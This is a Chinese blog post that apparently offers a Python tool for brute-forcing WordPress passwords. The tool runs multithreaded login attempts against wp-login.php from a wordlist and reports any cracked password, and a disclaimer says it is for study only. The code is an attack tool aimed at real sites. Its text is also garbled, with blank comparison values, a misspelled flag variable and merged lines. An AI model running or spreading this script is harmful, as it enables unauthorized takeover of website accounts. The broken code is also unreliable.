wordpress爆破脚本的编写
2024-09-02 02:20:59
import requests
import sys
import queue
import threading
import time
import getopt
urll=''
users=''
pss=''
threadss=''
class Mythread(threading.Thread):
def __init__(self,url,user,passwd,threads):
self.user=user
self.found=False
self.url=url
self.threads =threads
self.passwd=passwd
print("+++++加载字典中++++++++")
print(self.passwd)
self.pass1=queue.Queue()
file=open(self.passwd)
for i in file.readlines():
self.pass1.put(i.strip())
self.result=None
print("++++++++字典加载成功+++++++")
def goit(self):
for i in range(self.threads):
t =threading.Thread(target=self.joinpwd)
t.start()
print('破解线程启动%s'%t.ident)
while(not self.pass1.empty()):
print("=======还剩%s个口令"%self.pass1.qsize())
sys.stdout.flush()
time.sleep()
print('\n破解完毕') def __login(self,pwd):
urls='{}/wp-login.php'.format(self.url)
values = {'log': self.user, 'pwd': pwd, 'wp-submit': 'Log In',
'redirect_to': '{}/wp-admin'.format(self.url), 'test_cookie': ''}
my_cookie = {'wordpress_test_cookie': 'WP Cookie check'}
r = requests.post(url=urls, data=values, cookies=my_cookie, allow_redirects=False) # 禁用重定向,以便后边判断登陆状态
if r.status_code == :
return True
return False
def joinpwd(self):
while not self.pass1.empty() and not self.found ==True:
password=self.pass1.get()
if self.__login(password)==True:
self.foubd =True
self.result =password
print("破解%s 成功,密码为%s "%(self.user,password))
else:
self.found =False
if __name__=='__main__':
try:
opts, args= getopt.getopt(sys.argv[:],"u:w:p:t:")
for opt ,arg in opts:
if opt in ("-u"):
urll=arg
elif opt in ("-w"):
users=arg
elif opt in ("-p"):
pss=arg
pss=str(pss)
elif opt in ("-t"):
threadss=arg
threadss=int(threadss)
except:
print("获取参数时候报错 麻烦从新输入参数")
if len(sys.argv[:])!=:
print("用法")
exit()
b=Mythread(urll,users,pss,threadss)
b.goit()
print(b.result)
用法
此脚本仅用于学习参考 切勿用于非法用途 且勿违反法律道德,后果自负。
最新文章
- UWP学习记录11-设计和UI
- java @Autowired与@Resource的区别
- HTTP协议发展脉络
- WCF配置与服务寄宿
- SQL Server 2008 R2导出数据脚本的方法
- Oracle错误代码大全
- php 版本的indexof —— strpos坑爹
- 几款python集成开发环境
- The Pilots Brothers' refrigerator 分类: POJ 2015-06-15 19:34 12人阅读 评论(0) 收藏
- SQL语句 递归
- javascript——base64
- POJ 1979 深度优先搜索
- CSS布局部分知识总结
- 实战项目开发细节:C语言分离一个16进制数取出相应的位1或0
- ereg
- String StringBuilder 包装类
- linux软链接的创建、删除和更新
- 如何修改mac的root密码
- 论文笔记:Semantic Segmentation using Adversarial Networks
- 重启sqlserver服务 命令